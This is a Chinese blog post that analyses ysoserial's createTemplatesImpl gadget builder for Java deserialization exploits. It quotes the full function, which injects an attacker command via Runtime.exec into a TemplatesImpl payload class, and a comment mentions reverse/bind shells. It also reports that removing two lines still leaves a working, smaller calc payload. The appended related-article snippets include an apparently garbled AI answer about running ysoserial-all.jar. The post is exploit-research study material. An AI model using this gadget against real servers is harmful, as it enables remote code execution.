ysoserial Gadgets.createTemplatesImpl函数分析

最新推荐文章于 2024-09-07 21:09:28 发布
最新推荐文章于 2024-09-07 21:09:28 发布
阅读量3.3k 收藏
点赞数
分类专栏: 安全 Java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fnmsd/article/details/88543233
版权

前言

在阅读《java反序列化工具ysoserial分析》之后,对ysoserial有了一些更深的了解,但文章在对createTemplatesImpl函数进行分析中,没有解释一些代码作用,本文是对其分析的一些补充及发现的一些疑问。

在阅读本文前请先阅读《java反序列化工具ysoserial分析》中关于TemplatesImpl利用链以及createTemplatesImpl分析的部分

分析

createTemplatesImpl实现代码如下:

public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
            throws Exception {
    	//实例化TemplatesImpl
        final T templates = tplClass.newInstance();

        // use template gadget class
    	//************************创建Payload类开始*******************************
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        final CtClass clazz = pool.get(StubTransletPayload.class.getName());
        // run command in static initializer
        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
        String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
            command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
            "\");";
        clazz.makeClassInitializer().insertAfter(cmd);
        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);

        final byte[] classBytes = clazz.toBytecode();
		//************************创建Payload类结束*******************************
		
        // inject class bytes into instance,插入Class字节码到TemplatesImpl实例
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });
    
        // required to make TemplatesImpl happy,喵喵喵?
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }


  1. final CtClass clazz = pool.get(StubTransletPayload.class.getName());

可以看出,整个类是基于Gadgets文件中的StubTransletPayload类进行修改。

为什么要基于StubTransletPayload进行修改?

StubTransletPayload实现如下:

在这里插入图片描述

因为在调用链的defineTransletClasses函数时,会将父类为AbstractTranslet的class索引赋值给_transletIndex:

for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class,检测父类是否为AbstractTranslet
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

而后在函数getTransletInstance中,会将_transletIndex对应的类进行实例化:

AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();

所以我们需要将我们所期望的代码写入父类为AbstractTranslet的类的构造函数中。

Reflections.setFieldValue(templates, "_name", "Pwnr");

调用链的getTransletInstance函数中,首先进行了如下判断:

if (_name == null) return null;

如果不设置_name值会导致调用链直接退出,不进行后续的payload类实例化

疑问

Reflections.setFieldValue(templates, "_bytecodes", new byte[][] {
            classBytes, ClassFiles.classAsBytes(Foo.class)
        });

为什么_bytecodes数组中需要而外存放一个无用类,而不是只存放刚刚生成带有payload的类?

Foo类是一个只实现了Serializable接口没有包含任何其他内容的类,没有任何作用。

尝试着只保留payload类,也并不影响执行。

相关代码段:

  final int classCount = _bytecodes.length;
            _class = new Class[classCount];
			//重点位置:
            if (classCount > 1) {
                _auxClasses = new HashMap<>();
            }

            for (int i = 0; i < classCount; i++) {
                _class[i] = loader.defineClass(_bytecodes[i]);
                final Class superClass = _class[i].getSuperclass();

                // Check if this is the main class
                if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
                    _transletIndex = i;
                }
                else {
                    _auxClasses.put(_class[i].getName(), _class[i]);
                }
            }

TemplatesImpl类成员_auxClasses默认为null,可以看出只有_bytecodes数组长度>=2时,才会对_auxClasses进行创建。但是如果长度为1,并且父类为AbstractTranslet也不影响payload的执行。

Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());

这句删除了也不影响,看了jdk1.6/1.7/1.8的代码在执行TemplatesImpl的readObject函数时都会在结尾对_tfactory进行重新构造:

private void  readObject(ObjectInputStream is)
      throws IOException, ClassNotFoundException
{
。。。。
_tfactory = new TransformerFactoryImpl();
}

表示这个很迷。。

补充: _tfactory字段为transient修饰,并不参与序列化。

  1. 删除了疑问1项后,以CommonsCollections2为例,执行calc的payload大小从3231字节减少到了2753字节,减少了478字节。删除了疑问2代码后大小完全没变???

    查看代码,发现TemplatesImpl的_tfactory属性前面有transient修饰符,也就是说该属性并不参与到序列化中,所以疑问2这句加不加完全没区别。(也就是为什么readObject中会对其重新构造)

    在jdk1.6/1.8下进行了测试,Payload可以正常使用

ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3749
ysoserial这款工具,堪称为“java反序列利用神器”。
JDK7u21反序列链学习
「 虚幻私塾」
04-12 645
Python微信订餐小程序课程视频 https://blog.csdn.net/m0_56069948/article/details/122285951 Python实战量化交易理财系统 https://blog.csdn.net/m0_56069948/article/details/122285941 JDK7u21 1、前置知识 jdk7u21是一条不依赖CommonsCollections库依赖的,看利用链所有知识其实跟CommonsCollections也有重复,我们来学习一下以前没学过的类或者
小楼昨夜又春风,你知ysoserial-Gadget-URLDNS多少?
Summer's blog
05-13 3749
小楼昨夜又春风,你知ysoserial-Gadget-URLDNS多少? 你真的懂ysoserial其中的Gadget-URLDNS了吗?你确定吗?百分之百?不确定,还不来看看?
TemplatesImpl类Gadget中提取bytecode
fnmsd的博客
03-22 4503
大半年前开的头,扔那就给忘了,终于想起来给写完了(*/ω\*)
templateslmpl利用链
qq_62046696的博客
03-13 546
cc3Jdk版本:调用AnnoctionInvocationHandler中的版本需要在,
[Java安全]利用TemplatesImpl执行字节码
Y4tacker的博客
07-25 3594
文章目录defineClass利用TemplatesImpl执行字节码 defineClass 介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码 public class TouchFile{ public TouchFile() throws Exception { Runtime.getRuntime().exec("calc"); } } 把它编译成字节码后Base64 之后运行 Method defineClass =
利用TemplatesImpl加载字节码
Thunderclap的博客
02-06 529
调用了 TemplatesImpl#newTransformer() 并且它也是 public 类型的,如下也成功触发。TemplatesImpl 类中已经没有调用 getTransletClasses() 的方法了,而 getTransletInstance() 方法在。com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类中定义了一个内部类。Java中默认情况下,如果一个。方法中被调用了,所以构造如下链,P牛用的就是如下的链。
Web中间件常见安全漏洞
KHOST的博客
03-10 8655
第一章:IIS IIS 6 解析漏洞 IIS 7 解析漏洞 PUT任意文件写入 IIS短文件漏洞 HTTP.SYS远程代码执行 (MS15-034) RCE-CVE-2017-7269 第二章:Apache 未知扩展名解析漏洞 AddHandler导致的解析漏洞 ...
Java单向代码执行链配合的动态代码
qf2019的博客
04-21 397
Java 反序列化漏洞的危害不仅在于普通小工具所能带来的命令执行,还在于使用链构建的单向代码链所能实现的有限能力,因为Java应用程序场景和小工具大多构建单向代码执行。然而,在大多数情况下,比如需要echo和注入内存shell,我们实际上非常需要直接运行整个类或者运行一个上下文相关的多行代码来进行动态执行。它经常要求反序列化使用一个链来与另一个能够动态执行代码的链合作。这也是我们在这里主要讨论的情况。下面将简要介绍一些相对常见的方法,在这些方法中,下面的部分可以直接在动态代码上下文中执行。 单向代码利用了链
[Java安全]Fastjson 1.2.22-1.2.24 TemplatesImpl利用链分析
cosmoslin的博客
04-18 770
简介 对于Fastjson 1.2.22-1.2.24 版本的反序列化漏洞的利用,目前已知的主要有以下的利用链: 基于TemplateImpl; 基于JNDI(又分为基于Bean Property类型和Field类型); 这里我使用的环境是JDK7u51 fastjson-1.2.24.jar,commons-codec-1.12.jar,commons-io-2.5.jar,unboundid-ldapsdk-4.0.9.jar 反序列化TemplatesImpl类+类加载触发 先看一下POC: Te
[Java反序列化]Java-CommonsCollections2TemplatesImpl利用链分析
Y4tacker的博客
07-28 545
文章目录Java-CommonsCollections2TemplatesImpl利用链分析完整代码 Java-CommonsCollections2TemplatesImpl利用链分析 我们知道我们之前可以利用TemplatesImpl 构造出⽆Transformer数组的利⽤链,那这里是否可以实现呢,答案是是的,在这里的queue 现在开始正文,还是稍微详细说一下利用过程吧 现在我们的目标就是通过PriorityQueue来调用TemplatesImpl的newTransformer来加载字节码 T
Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)
Y4tacker的博客
09-13 764
文章目录写在前面流程分析 写在前面 关于TemplatesImpl加载字节码就不多说了,之前也写过自己翻一翻,或者网上看看其他大佬的,至于为什么选择这一个,因为这里面大多数过程都有,除了$ref,算是比较全面了 流程分析 核心代码 public class test1 { public static void main(String[] args) throws Exception{ String payload = "{\"@type\":\"com.sun.org.apache
修改ysoserial使其支持生成代码执行Payload
热门推荐
fnmsd的博客
03-13 1万+
ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。 https://github.com/frohoff/ysoserial 一般该工具可生成执行任意命令的序列化对象,通过对工具代码进行简单修改,也可使其执行任意的Java代码,以此来绕过对命令执行的限制。 修改 作者在115行的注释写到: TODO: could also do...
ysoserial反序列化gadget原理-part1:URLDNS/CommonsCollections1
mole_exp的博客
01-27 3263
文章目录前言URLDNS依赖payload构造gadget原理简述Groovy1依赖payload构造gadgetCommons-Beanutils1 前言 其实反序列化利用链分析的文章写起来没啥意思,无非就是函数调用栈的复述,序列化对象(payload)的构造无非就是为了满足某条函数调用的路径而已。如果没有亲自调试过,也是看不懂别人的文章的。但好记性不如烂笔头,况且笔者记性也不是很好,所以还是来篇流水账记录一下之前的学习。 URLDNS 依赖 无 payload构造 注:ysoserial工具里说的pa
Java反序列化漏洞-TemplatesImpl利用链分析
柠檬i的博客
09-07 1506
defineClass可以加载字节码,但由于defineClass的作用域是protected,所以攻击者很少能直接利用到它,但它却是我们常用的一个攻击链 TemplatesImpl 的基石。
java反序列化-ysoserial-调试分析总结篇(2)
终极冥帝
03-01 862
前言:不格小说网 https://m.vbuge.com 这篇主要分析commonCollections2,调用链如下图所示: 调用链分析分析环境:jdk1.8.0 反序列化的入口点为src.zip!/java/util/PriorityQueue.java 此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类 ...
Java反序列化利用链挖掘之Shiro反序列化
HongYu012的博客
02-24 1268
在跟了一遍commons-collections系列的payload后,终于可以开始解决一下当时对shiro反序列化模凌两可的认识了。 当前,不管是国内实际的xx行动还是ctf比赛,shiro反序列化会经常看到。但在实际利用这个漏洞的时候,会发现我们无法在tomcat下直接利用shiro-sample中的commons-collections:3.2.1(2021-03-16更新,这里经p牛指正,shiro并没有依赖cc库,详情)。 我们前面已经对commons-collections系列利用链...
爆赞好文之java动态字节码加载(TemplatesImpl)简谈
2301_79724395的博客
04-17 1343
虽然已经学过了,不过忘完了,nice,重学动态加载就是很动态知道吧,你以为,说了等于没说,怎么个动态法呢?具体是在于三个函数loadClass()从已经加载的类缓存、父加载器等位置寻找类(其实就是双亲委派机制),在前面没有找到的情况下执行findClassfindClass()根据基础URL指定的方法来加载类的字节码,可能会在本地文件系统,jar包,或是远程http服务器上读取字节码,然后交给下一个函数defineClass()的作用就是处理前面传入的字节码,将其处理为真正的Java类。
[Java安全]ysoserial_CommonCollections2_Transformer/TemplatesImpl分析
cosmoslin的博客
04-04 1425
本机环境: JDK版本:jdk1.7u_51 CC版本:Commons-Collections 4.0 调用链 Gadget chain: ObjectInputStream.readObject() PriorityQueue.readObject() ... TransformingComparator.compare() InvokerTransformer.transform() Method.invoke() Runtime.e
ysoserial-all.jar怎么打开
最新发布
03-17
### 如何在Java中运行或打开 `ysoserial-all.jar` 文件 要运行或打开 `ysoserial-all.jar` 文件,可以通过命令行工具或者集成开发环境(IDE)来完成。以下是具体的操作说明: #### 使用命令行运行 `ysoserial-all.jar` 1. **确认JDK已安装并配置好环境变量** 需要确保计算机上已经安装了 JDK 并正确设置了 JAVA_HOME 和 PATH 环境变量[^6]。 2. **定位到 JAR 文件所在目录** 打开终端或命令提示符,切换至包含 `ysoserial-all.jar` 的目标文件夹。例如: ```bash cd /path/to/target/directory/ ``` 3. **执行 JAR 文件** 使用以下命令启动 JAR 文件: ```bash java -jar ysoserial-all.jar ``` 如果需要指定特定参数,则可以在后面附加这些选项。例如,如果想查看帮助信息,可以尝试: ```bash java -jar ysoserial-all.jar --help ``` 4. **验证输出结果** 成功运行后,程序会显示可用的序列化漏洞利用方式以及相关选项列表[^7]。 #### 在 IDE 中加载和调试 `ysoserial-all.jar` 对于更复杂的场景,可能还需要通过 IDE 来分析源码或设置断点进行调试。操作如下: 1. **创建新项目** 在 Eclipse 或 IntelliJ IDEA 等支持 Java 开发的环境中新建一个 Maven/Gradle 项目。 2. **导入外部库** 将下载好的 `ysoserial-all.jar` 添加到项目的构建路径中。如果是 Maven 项目,可以直接将其放置于 `lib` 文件夹并通过 pom.xml 引入;而 Gradle 则需修改 build.gradle 文件中的 dependencies 节点。 3. **编写测试类** 创建一个新的 Java 类用于调用 jar 包内的功能函数。比如下面这段简单的代码演示了如何实例化某个对象并打印其属性值: ```java import com.github.mbechler.yso.payloads.util.Gadgets; public class TestYsoSerial { public static void main(String[] args) throws Exception { System.out.println(Gadgets.createPayload(args[0])); } } ``` 4. **运行应用程序** 设置合适的输入参数之后即可点击 Run 按钮开始执行上述脚本逻辑[^8]。 --- ### 注意事项 - 运行此类工具前务必清楚潜在风险,仅限合法授权范围内研究用途。 - 不同版本之间可能存在差异,请参照官方文档获取最新指导[^9]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值